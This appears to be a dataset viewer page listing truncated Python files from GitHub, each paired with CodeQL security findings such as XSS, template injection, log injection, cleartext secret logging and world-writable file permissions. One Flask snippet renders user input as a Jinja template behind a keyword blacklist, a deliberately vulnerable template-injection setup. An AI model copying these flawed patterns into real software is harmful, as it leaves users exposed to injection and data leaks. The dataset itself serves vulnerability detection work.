"blob_id": "ddb102fea6a4f1a3ff8074db3e7362217ee35142",
"branch_name": "refs/heads/master",
"committer_date": 1691037619000,
"content_id": "d3f5f7407ff7fb4aa0395f0f25c74f50ebbc40c1",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "7dfc958846a98c9dc90829ace237adb0f4e79057",
"extension": "py"... | 3.0625 | stackv2 | from itertools import chain
from jinja2 import Environment
from jinja2.nodes import Getattr, Getitem, Assign
from ploomber.placeholders.placeholder import Placeholder
class JinjaExtractor:
"""Class for parsing jinja templates
Parameters
----------
code : str or Placeholder
SQL code
"""
... | 68 | 29.1 | 80 | 17 | 410 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_e8ef82a858a54fbd_045c3692", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
28
] | [
null
] | [
19
] | [
32
] | |
2024-11-18T22:27:44.225283+00:00 | 1,571,213,961,000 | c7300dc5043f9b7319751159a22423f42f036a72 | 3 | {
"blob_id": "c7300dc5043f9b7319751159a22423f42f036a72",
"branch_name": "refs/heads/master",
"committer_date": 1571213961000,
"content_id": "87bb1d2d8e54e719ea9b293f86da43156a5b2432",
"detected_licenses": [
"MIT"
],
"directory_id": "da218cecbf3bc0aefffcdbad95725faabf35b3f0",
"extension": "py",
"fi... | 2.625 | stackv2 | import http.server
import socketserver
import mt940
import logging
import json
PORT = 8000
class Handler(http.server.BaseHTTPRequestHandler):
def _response_400(self, msg):
self.send_response(400)
self.send_header('Content-type', 'text/html')
self.send_header("Content-length", len(msg))
... | 64 | 29.27 | 95 | 13 | 455 | python | [{"finding_id": "codeql_py/log-injection_e434a38a7ff2a245_5797f0c2", "tool_name": "codeql", "rule_id": "py/log-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This log entry depends on a [user-provided value](1).", "remediation": "", "location": {"file_path": "unkno... | 5 | true | [
"CWE-117",
"CWE-117",
"CWE-117",
"CWE-117",
"CWE-117"
] | [
"py/log-injection",
"py/log-injection",
"py/log-injection",
"py/log-injection",
"py/log-injection"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This log entry depends on a [user-provided value](1).",
"This log entry depends on a [user-provided value](1).",
"This log entry depends on a [user-provided value](1).",
"This log entry depends on a [user-provided value](1).",
"This log entry depends on a [user-provided value](1)."
] | [
20,
20,
41,
41,
41
] | [
null,
null,
null,
null,
null
] | [
62,
78,
22,
38,
57
] | [
76,
95,
36,
55,
82
] | |
2024-11-18T22:14:58.607151+00:00 | 1,563,861,294,000 | b32a3453db4924eca98c2a619e97cfebd1bbe10e | 3 | {
"blob_id": "b32a3453db4924eca98c2a619e97cfebd1bbe10e",
"branch_name": "refs/heads/master",
"committer_date": 1563861294000,
"content_id": "f24b7914e51cf3223d9f030f769fca56d8262d8c",
"detected_licenses": [
"MIT"
],
"directory_id": "9e81000484f826f377b431d8c668830b48712789",
"extension": "py",
"fi... | 2.78125 | stackv2 | from __future__ import annotations
from abc import ABC, abstractmethod
from pathlib import Path
from typing import List, Optional
from jinja2 import Template
TEMPLATE_DIR: Path = Path(__file__).parents[0] / 'template'
class DataModelField:
def __init__(self, name: str, type_hint: Optional[str] = None, default:... | 67 | 30.1 | 97 | 16 | 467 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_697000366e2a0520_926db266", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
30
] | [
null
] | [
26
] | [
88
] | |
2024-11-18T22:15:01.620186+00:00 | 1,423,208,042,000 | 732d13313543a15a102b13d60723401987959e08 | 3 | {
"blob_id": "732d13313543a15a102b13d60723401987959e08",
"branch_name": "refs/heads/master",
"committer_date": 1423208042000,
"content_id": "15ac848af9fd8105c8ec66239ade8ff1c3d392c2",
"detected_licenses": [
"MIT"
],
"directory_id": "03f35d822d6c90ea11f3d51c22196606100bb170",
"extension": "py",
"fi... | 2.578125 | stackv2 | import os
import sys
from flask import Flask, request, render_template
import cups
import tempfile
app = Flask(__name__)
@app.route('/')
def index():
return "hello"
@app.route('/upload', methods=['GET', 'POST'])
def upload():
if request.method == 'GET':
return render_template('upload.html')
else:... | 31 | 25.55 | 81 | 15 | 200 | python | [{"finding_id": "codeql_py/reflective-xss_a45e0f9ecdb1e599_fe6d6c68", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi... | 1 | true | [
"CWE-079"
] | [
"py/reflective-xss"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Cross-site scripting vulnerability due to a [user-provided value](1)."
] | [
23
] | [
null
] | [
16
] | [
78
] | |
2024-11-18T22:55:34.498184+00:00 | 1,620,232,045,000 | 96826841f052f1d3d02918f7abfcb235e6717ebb | 3 | {
"blob_id": "96826841f052f1d3d02918f7abfcb235e6717ebb",
"branch_name": "refs/heads/main",
"committer_date": 1620232045000,
"content_id": "797c14b92aff186230d9007cdb23f8c5a571b65f",
"detected_licenses": [
"MIT"
],
"directory_id": "9f55630978347a709fa206142a70ab2fcd3990e5",
"extension": "py",
"file... | 3 | stackv2 | # marriage bereau registration form :
from tkinter import *
def details():
print(f"Full Name : {name.get()}")
print(f"Address : {address.get()}")
print(f"City : {City.get()}")
print(f"Gender : {Gender.get()}")
print(f"Date of birth : {dob.get()}")
print(f"Education : {education.get()}")
pr... | 70 | 30.87 | 85 | 11 | 616 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_a7d09fac56e45cea_6721bf59", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh... | 2 | true | [
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text.",
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text."
] | [
9,
13
] | [
null,
null
] | [
11,
11
] | [
37,
45
] | |
2024-11-19T00:07:30.603864+00:00 | 1,526,574,342,000 | 76a3f99d00fb2767dbb88089e5d3c98a16a8f7e4 | 2 | {
"blob_id": "76a3f99d00fb2767dbb88089e5d3c98a16a8f7e4",
"branch_name": "refs/heads/master",
"committer_date": 1526574342000,
"content_id": "7465e3776bfa7d1c7601ee3194eec806c55594d4",
"detected_licenses": [
"MIT"
],
"directory_id": "b2236e285259adfa56740f469d5449d8cf32c8f3",
"extension": "py",
"fi... | 2.421875 | stackv2 | #!python3
import os
import shutil
# change the python working directory to the project watch folder
watch_folder = 'path/to/project/watch/folder'
output_dir01 = 'path/to/project/output/folder'
output02 = 'path/to/project/secondary/output/folder'
path_list = []
def project_zip():
os.chdir(watch_folder)
# ch... | 66 | 33.97 | 108 | 29 | 564 | python | [{"finding_id": "codeql_py/overly-permissive-file_11b48d52bd0c57ca_5657aeb0", "tool_name": "codeql", "rule_id": "py/overly-permissive-file", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Overly permissive mask in chmod sets file to world writable.", "remediation": "", "location": ... | 1 | true | [
"CWE-732"
] | [
"py/overly-permissive-file"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Overly permissive mask in chmod sets file to world writable."
] | [
60
] | [
null
] | [
17
] | [
44
] | |
2024-11-19T00:33:34.031028+00:00 | 1,561,411,272,000 | 254222967d8c5e56ada11978445deb98c169926a | 3 | {
"blob_id": "254222967d8c5e56ada11978445deb98c169926a",
"branch_name": "refs/heads/master",
"committer_date": 1561411272000,
"content_id": "4b55b2b4e1dee15e868bb8a0393fba49ceb9d371",
"detected_licenses": [
"MIT"
],
"directory_id": "6b6ebb8ae399a7fb9b4b74f603d0e49a7303770d",
"extension": "py",
"fi... | 2.90625 | stackv2 | #!/usr/bin/env python3
import subprocess
import pyowm
import configparser
import os.path
import requests
import json
from commands.tts import text_to_speech
config = configparser.ConfigParser()
config.read(os.path.dirname(__file__) + '/../../config.ini')
owm = pyowm.OWM(config.get('api_keys', 'openweathermap'))
ipstac... | 38 | 33.55 | 119 | 14 | 323 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_b4c7e58c10e76ec7_28d90f97", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
29
] | [
null
] | [
11
] | [
27
] | |
2024-11-18T23:28:42.213548+00:00 | 1,598,477,967,000 | 59eddcf8c54d4a9385a33c320e3f5d5b8e5baa5b | 3 | {
"blob_id": "59eddcf8c54d4a9385a33c320e3f5d5b8e5baa5b",
"branch_name": "refs/heads/master",
"committer_date": 1598477967000,
"content_id": "24816533b791ebc89bd627b46a8d52ad0b34b3de",
"detected_licenses": [
"MIT"
],
"directory_id": "41d27a8941c720ebb80fae2d974fe7224db6978b",
"extension": "py",
"fi... | 3.0625 | stackv2 | import hashlib
from database.db_base import *
class DBAuth(DBBase):
def __init__(self, database, parent):
super().__init__(database)
self.parent = parent
self.t_users = '/users'
self.t_user_types = '/user_types'
self.t_last_id = '/last_id'
def add_new_user(self, user... | 167 | 32.96 | 105 | 17 | 1,227 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_779bd7007cd7d346_79771fe8", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is in... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function.\n[Sensitive data (password)](2) is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally e... | [
167
] | [
null
] | [
31
] | [
60
] | |
2024-11-19T01:11:26.351357+00:00 | 1,649,793,936,000 | 436ce014edbb010fd19c87033ce4b5f3ada4bfc3 | 3 | {
"blob_id": "436ce014edbb010fd19c87033ce4b5f3ada4bfc3",
"branch_name": "refs/heads/master",
"committer_date": 1649793936000,
"content_id": "e436522b514e425de6c5833f9204b7a9dd09648b",
"detected_licenses": [
"MIT"
],
"directory_id": "746302ed4d569d41968dc8769119c7f51eea5eb9",
"extension": "py",
"fi... | 2.53125 | stackv2 | #! /usr/bin/env python
import getpass
import os
import readline
import pathlib
import random
import shutil
import string
import xmltodict
import subprocess
import string
import sys
import glob
def randomString(stringLength=10):
"""Generate a random string of fixed length """
letters = string.ascii_letters + s... | 212 | 34.89 | 138 | 14 | 2,023 | python | [{"finding_id": "codeql_py/clear-text-storage-sensitive-data_52b2134d41b095fb_d178f445", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text.\... | 2 | true | [
"CWE-312",
"CWE-312"
] | [
"py/clear-text-storage-sensitive-data",
"py/clear-text-storage-sensitive-data"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression stores [sensitive data (password)](1) as clear text.\nThis expression stores [sensitive data (password)](2) as clear text.",
"This expression stores [sensitive data (secret)](1) as clear text."
] | [
164,
172
] | [
null,
null
] | [
11,
11
] | [
30,
46
] | |
2024-11-18T23:48:17.671258+00:00 | 1,473,910,965,000 | e2be30897c54f101fe2676ccd96e21bb838a0e02 | 2 | {
"blob_id": "e2be30897c54f101fe2676ccd96e21bb838a0e02",
"branch_name": "refs/heads/master",
"committer_date": 1473910965000,
"content_id": "455358a6ff6a9ad095f37cece2960177632e33c4",
"detected_licenses": [
"MIT"
],
"directory_id": "3931d2cc1ebc364ca696a4fadb0ce3b4f9bcee42",
"extension": "py",
"fi... | 2.34375 | stackv2 | # encoding: utf-8
#!/usr/bin/python
import MySQLdb, re, sys, urllib2, Queue, urllib, ssl
from urllib2 import Request, urlopen, URLError, HTTPError
# from requests import Request, Session
db = MySQLdb.connect("beta.moe","yudachi","poi","crawler" )
cursor = db.cursor()
cursor.execute("SELECT VERSION()")
data = cursor.... | 149 | 25.48 | 96 | 17 | 1,254 | python | [{"finding_id": "codeql_py/incomplete-url-substring-sanitization_14851893a611221d_285624fc", "tool_name": "codeql", "rule_id": "py/incomplete-url-substring-sanitization", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "The string [pixiv.net](1) may be at an arbitrary position in the s... | 1 | true | [
"CWE-020"
] | [
"py/incomplete-url-substring-sanitization"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"The string [pixiv.net](1) may be at an arbitrary position in the sanitized URL."
] | [
85
] | [
null
] | [
26
] | [
42
] | |
2024-11-19T00:29:32.357046+00:00 | 1,609,296,690,000 | cdc721eff73a0749a98c207ed071ce8fb0276c66 | 2 | {
"blob_id": "cdc721eff73a0749a98c207ed071ce8fb0276c66",
"branch_name": "refs/heads/main",
"committer_date": 1609296690000,
"content_id": "0dd05aca8007f11ddd713a074fa7edabd9d4d69e",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "03ff435a19cb5f0cfbf2f41c121c6d8f81401948",
"extension": "py",
... | 2.453125 | stackv2 | #! /usr/bin/env python
#encoding=utf-8
from flask import Flask,render_template,redirect
from flask import request
import urllib
import sys
import os
from jinja2 import Template
app = Flask(__name__)
def safe_msg(msg):
blacklist = ['~','set','or','args','_','[','request','lipsum','=','chr','json','g','.',"'",'{{',... | 43 | 23.51 | 146 | 14 | 279 | python | [{"finding_id": "codeql_py/template-injection_e9944bb8a6d3773d_859b5968", "tool_name": "codeql", "rule_id": "py/template-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This template construction depends on a [user-provided value](1).", "remediation": "", "location": ... | 3 | true | [
"CWE-074",
"CWE-079",
"CWE-079"
] | [
"py/template-injection",
"py/jinja2/autoescape-false",
"py/jinja2/autoescape-false"
] | [
"HIGH",
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This template construction depends on a [user-provided value](1).",
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks.",
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
35,
35,
37
] | [
null,
null,
null
] | [
22,
13,
13
] | [
75,
76,
48
] | |
2024-11-18T23:05:33.983865+00:00 | 1,622,772,096,000 | 92c0103416b6f591f8461ec24e7fa05d9fd67dc9 | 3 | {
"blob_id": "92c0103416b6f591f8461ec24e7fa05d9fd67dc9",
"branch_name": "refs/heads/main",
"committer_date": 1622772096000,
"content_id": "423a2d0fe9532da333eb42c329f68b0af0121777",
"detected_licenses": [
"MIT"
],
"directory_id": "536eb9a35d0131939cbea79a8945388b3cd6c9ea",
"extension": "py",
"file... | 2.84375 | stackv2 | import re
import urllib
import pandas as pd
import analysis as sa
from collections import Counter
from interface import search, connect
def as_df(query):
# Initialize empty dataframe
df = pd.DataFrame({
'tweet': [],
'clean_tweet': [],
'predicted-sentiment': [],
'polarity':[],
... | 73 | 29.64 | 115 | 15 | 509 | python | [{"finding_id": "codeql_py/overly-large-range_f6de26205014a703_bc72b806", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that is equivalent to \\[$%&'()*+,\\-.\\/0-9:;<=>?@A-Z\\\\[\\\\\\\\]^_\\].", ... | 1 | true | [
"CWE-020"
] | [
"py/overly-large-range"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Suspicious character range that is equivalent to \\[$%&'()*+,\\-.\\/0-9:;<=>?@A-Z\\\\[\\\\\\\\]^_\\]."
] | [
63
] | [
null
] | [
58
] | [
61
] | |
2024-11-18T23:10:59.675177+00:00 | 1,567,060,209,000 | 0ba73774b82151aaa0fb1bb1b845d8d7e83ff893 | 3 | {
"blob_id": "0ba73774b82151aaa0fb1bb1b845d8d7e83ff893",
"branch_name": "refs/heads/master",
"committer_date": 1567060209000,
"content_id": "e5ffcbaacc1b4ea1c0b3566a34a5535bc5c80228",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "193c70b5c85526250683b8e1762692fec4232f47",
"extension": "py"... | 3.03125 | stackv2 | #!/usr/bin/env python
# encoding: utf-8
"""
@version: v1.0
@author: xukui
@license: Apache Licence
@contact: fakerkayn@gmail.com
@software: PyCharm
@file: meta_picture.py.py
@time: 2019-08-29 16:23
@description:高德坐标拾取网站:https://lbs.amap.com/console/show/picker
需要更改本文件最底下的图片路径还有31行左右的self.api_key,然后就可以使用了
当然还需要pip3 ins... | 170 | 24.06 | 94 | 16 | 1,196 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_72c10eec79efb606_224d7d8a", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
48
] | [
null
] | [
15
] | [
37
] | |
2024-11-18T23:11:00.759009+00:00 | 1,437,755,048,000 | 72b17289e2bca0df559b18cd5bd107b0afb55407 | 2 | {
"blob_id": "72b17289e2bca0df559b18cd5bd107b0afb55407",
"branch_name": "refs/heads/master",
"committer_date": 1437755048000,
"content_id": "1b99336c2c09ca467a7506020128211e7757e644",
"detected_licenses": [
"MIT"
],
"directory_id": "5d6084741ada07b784091ad94a908e1be59e902f",
"extension": "py",
"fi... | 2.484375 | stackv2 | from flask import Flask, make_response, render_template, request
import logging
import json
import requests
import config
import random
import string
from google.appengine.ext import ndb
app = Flask(__name__)
CONTENT_TYPE = {'Content-Type': 'application/json;charset=UTF-8'}
LIFX_ENDPOINT = 'https://api.lifx.com/v1be... | 148 | 27.51 | 135 | 18 | 949 | python | [{"finding_id": "codeql_py/reflective-xss_f3df772941b3e668_60fd1b37", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi... | 6 | true | [
"CWE-079",
"CWE-117",
"CWE-117",
"CWE-117",
"CWE-117",
"CWE-079"
] | [
"py/reflective-xss",
"py/log-injection",
"py/log-injection",
"py/log-injection",
"py/log-injection",
"py/jinja2/autoescape-false"
] | [
"HIGH",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"Cross-site scripting vulnerability due to a [user-provided value](1).",
"This log entry depends on a [user-provided value](1).",
"This log entry depends on a [user-provided value](1).",
"This log entry depends on a [user-provided value](1).",
"This log entry depends on a [user-provided value](1).",
"Usin... | [
143,
73,
83,
87,
142,
51
] | [
null,
null,
null,
null,
null,
null
] | [
12,
18,
18,
18,
18,
16
] | [
39,
69,
39,
41,
77,
60
] | |
2024-11-18T23:11:08.174775+00:00 | 1,633,514,819,000 | 9254eea2e6d9c6cacb8c86b830f8013bde46c4ff | 3 | {
"blob_id": "9254eea2e6d9c6cacb8c86b830f8013bde46c4ff",
"branch_name": "refs/heads/main",
"committer_date": 1633514819000,
"content_id": "040514304ccf5c07821fd092f043b123a214cea6",
"detected_licenses": [
"MIT"
],
"directory_id": "74087101304295b4de73e7b330c0e0a318eeafef",
"extension": "py",
"file... | 3.3125 | stackv2 | import random
from emulators.Device import Device
from emulators.Medium import Medium
from emulators.MessageStub import MessageStub
class GossipMessage(MessageStub):
def __init__(self, sender: int, destination: int, secrets):
super().__init__(sender, destination)
# we use a set to keep the "secr... | 88 | 33.67 | 119 | 18 | 686 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_f71b4cff9e7ce22c_d6645cc1", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r... | 4 | true | [
"CWE-312",
"CWE-312",
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text.",
"This expression logs [sensitive data (secret)](1) as clear text.",
"This expression logs [sensitive data (secret)](1) as clear text.",
"This expression logs [sensitive data (secret)](1) as clear text."
] | [
50,
73,
75,
88
] | [
null,
null,
null,
null
] | [
15,
19,
19,
15
] | [
70,
60,
59,
70
] | |
2024-11-18T23:11:14.655124+00:00 | 1,563,233,406,000 | dddc0b81ee41046aa352aba186dfc391ef7ddd2a | 3 | {
"blob_id": "dddc0b81ee41046aa352aba186dfc391ef7ddd2a",
"branch_name": "refs/heads/master",
"committer_date": 1563233406000,
"content_id": "2751a41ba0a44f5f7904c26924a80a9778abd437",
"detected_licenses": [
"MIT"
],
"directory_id": "cdc4da1b1fa3f241fc7152da5d2278d408945dbc",
"extension": "py",
"fi... | 2.859375 | stackv2 | # local
import only_otters.scrapetools.autobrowser as autobrowser
import only_otters.scrapetools.util as util
# std
from functools import partial
import re
from typing import Any, Generator, Dict, Optional
# other
from lxml import html as lhtml
import requests
import yaml
class Keywords:
"""A simple structure t... | 447 | 31.4 | 99 | 18 | 3,117 | python | [{"finding_id": "codeql_py/redos_8a4e367526f42b78_3e4220ee", "tool_name": "codeql", "rule_id": "py/redos", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This part of the regular expression may cause exponential backtracking on strings starting with '${{' and containing many repetiti... | 1 | true | [
"CWE-1333"
] | [
"py/redos"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This part of the regular expression may cause exponential backtracking on strings starting with '${{' and containing many repetitions of '0'."
] | [
183
] | [
null
] | [
57
] | [
63
] | |
2024-11-19T00:24:52.486265+00:00 | 1,693,490,279,000 | 345458f76d5ec9bbfdf280da1df7ddcb44783ecc | 3 | {
"blob_id": "345458f76d5ec9bbfdf280da1df7ddcb44783ecc",
"branch_name": "refs/heads/master",
"committer_date": 1693490279000,
"content_id": "8f9389c205e37d10d0a440ac247b745536c518ef",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "e78a66b3201cc5f6b9fd9a896067c616d97fd669",
"extension": "py"... | 3.0625 | stackv2 | import logging
import os
import shutil
import stat
import uuid
from contextlib import contextmanager
from io import BytesIO
from typing import IO, Any, Callable, Iterator, Optional, Union
logger = logging.getLogger(__name__)
def robust_rmtree(path: Union[str, bytes]) -> None:
"""
Robustly tries to delete pat... | 234 | 32.79 | 122 | 17 | 1,777 | python | [{"finding_id": "codeql_py/overly-permissive-file_bfa6a669bff5df5e_33fa1061", "tool_name": "codeql", "rule_id": "py/overly-permissive-file", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Overly permissive mask in chmod sets file to world writable.", "remediation": "", "location": ... | 2 | true | [
"CWE-732",
"CWE-732"
] | [
"py/overly-permissive-file",
"py/overly-permissive-file"
] | [
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM"
] | [
"Overly permissive mask in chmod sets file to world writable.",
"Overly permissive mask in chmod sets file to world writable."
] | [
155,
161
] | [
null,
null
] | [
17,
5
] | [
52,
46
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.